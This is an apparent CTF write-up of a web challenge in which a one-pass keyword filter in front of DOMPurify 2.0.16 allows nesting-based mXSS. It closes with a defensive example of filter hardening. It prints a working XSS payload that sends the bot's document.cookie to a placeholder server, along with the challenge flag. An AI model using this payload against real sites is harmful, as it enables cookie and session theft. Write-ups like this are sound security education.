Vulnerable to mXSS. The backend tries to filter out the word **math** before sanitizing; the vulnerable code:

```javascript
function secureQuery(string) {
  // let's do this real quick, friends are waiting for me at the Drunken Bathrobe
  const reg = /math/gi; // nobody likes math
  // Single pass only: deleting one match can splice the characters around it into a new "math"
  let res = string.replaceAll(reg, "");
  res = DOMPurify.sanitize(res);
  return res;
}
```

The filtered string is then run through DOMPurify. Inside the Dockerfile:

```bash
RUN npm i ejs @fastify/view @fastify/formbody @fastify/static dompurify@2.0.16 jsdom
```

DOMPurify 2.0.16 is vulnerable to nesting-based mXSS; the fix is the upgrade from v2.0.16 to v2.0.17. The relevant case from the DOMPurify test fixtures:

```
"title": "Tests against nesting-based mXSS behavior 2/2",
"payload": "<math><mtext><table><mglyph><style><math>CLICKME</math>",
```

mXSS reading, specifically DOMPurify:

Tools to test:

Code for the backend check (the bot that sets the flag cookie and visits the submitted URL):

```javascript
const puppeteer = require("puppeteer"); // import assumed; browser_options is defined elsewhere in the challenge

const cookies = [
  {
    name: "flag",
    value: process.env.FLAG,
  },
];

async function checkReport(query) {
  const browser = await puppeteer.launch(browser_options);
  try {
    const page = await browser.newPage();
    const urlToVisit = "" + query; // the app's base URL is not preserved in this copy
    console.log("URL to visit:", urlToVisit);
    // Navigate to the app origin first so the cookie is set on the right domain
    await page.goto("");
    await page.setCookie(...cookies);
    // Then open the attacker-controlled URL; any JS that runs here can read document.cookie
    await page.goto(urlToVisit, {
      waitUntil: "networkidle0",
      timeout: 10000,
    });
    await browser.close();
  } catch {
    await browser.close();
  }
}
```

The filter runs only once, so writing the banned word with an upper-case copy of itself spliced inside (`maMATHth`) makes the case-insensitive `replaceAll` delete the inner `MATH` and leave exactly `math` behind. The reconstructed `<math>` nesting payload then reaches the vulnerable DOMPurify 2.0.16, the `<img onerror>` survives sanitization, and the bot's cookie is sent to our server. The `+` is URL-encoded as `%2b` because the payload travels in the query string. Final payload that evades the **math** filter and executes a callback to our server with the flag:

```payload-final
<maMATHth><mtext><table><mglyph><style><maMATHth><img src=x onerror=document.location='http://YOUR-SERVER/?c='%2bdocument.cookie;></mMATHath>
```

![[Pasted image 20221211011536.png]]

Flag:

```flag
hctf{my_n3w_flag-fl4vor3d_c0ck7ail}
```

---

Back to [[_WebSite Publish/CTF/CTF Index|CTF Index]]

Tags: #ctf #hackappatoi2022 #xss #mxss #dompurify #web

Related:
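The splice trick behind the final payload, as an added example that is not part of the original writeup or the challenge code: the challenge's single-pass `replaceAll` filter is reproduced next to a fixed-point variant that strips until the string stops changing, and a reject-only check that never rewrites the input. The DOMPurify stage is omitted so the file runs offline under plain Node.js; the sample strings are constructed for the example.

```javascript
// Added example, not the challenge's own code. Shows why a one-pass
// "delete the forbidden word" filter in front of a sanitizer can be
// made to *produce* the forbidden word, and two ways to avoid that.

// The challenge's filter stage, reproduced without the DOMPurify call.
function singlePassFilter(input) {
  return input.replaceAll(/math/gi, "");
}

// Hardened variant: keep stripping until a pass changes nothing, so
// deleting one occurrence can never splice a fresh "math" together.
// maxRounds guards against pathological input; each round removes
// at least four characters, so it cannot loop forever anyway.
function fixedPointFilter(input, pattern = /math/gi, maxRounds = 100) {
  let current = input;
  for (let round = 0; round < maxRounds; round++) {
    const next = current.replaceAll(pattern, "");
    if (next === current) return next;
    current = next;
  }
  throw new Error("filter did not converge");
}

// Alternative: reject instead of rewrite. A check that only answers
// yes/no has no splice problem because it never builds a new string.
// No "g" flag here: a global regex carries lastIndex state across test() calls.
function containsForbiddenWord(input, pattern = /math/i) {
  return pattern.test(input);
}

// Constructed inputs (assumed, not taken from the challenge).
const bypassPayload =
  "<maMATHth><mtext><table><mglyph><style><maMATHth>x</mMATHath>";
const doubleSplice = "mamaMATHthth"; // needs two extra rounds to disappear

// Run each stage and report whether "math" survived it.
function compareFilters(input) {
  const single = singlePassFilter(input);
  const fixed = fixedPointFilter(input);
  return {
    single,
    fixed,
    singleStillHasMath: containsForbiddenWord(single),
    fixedStillHasMath: containsForbiddenWord(fixed),
  };
}

console.log(compareFilters(bypassPayload));
console.log(compareFilters(doubleSplice));
```

`compareFilters(bypassPayload).single` is the exact `<math><mtext><table><mglyph><style><math>…` nesting shape from the DOMPurify fixture, which is what the vulnerable sanitizer then receives; the fixed-point output contains no `math` at all. Note that the fixed-point filter only repairs the filter's own logic; the real fix for the challenge is still the DOMPurify upgrade, since a sanitizer must not rely on an upstream keyword blocklist.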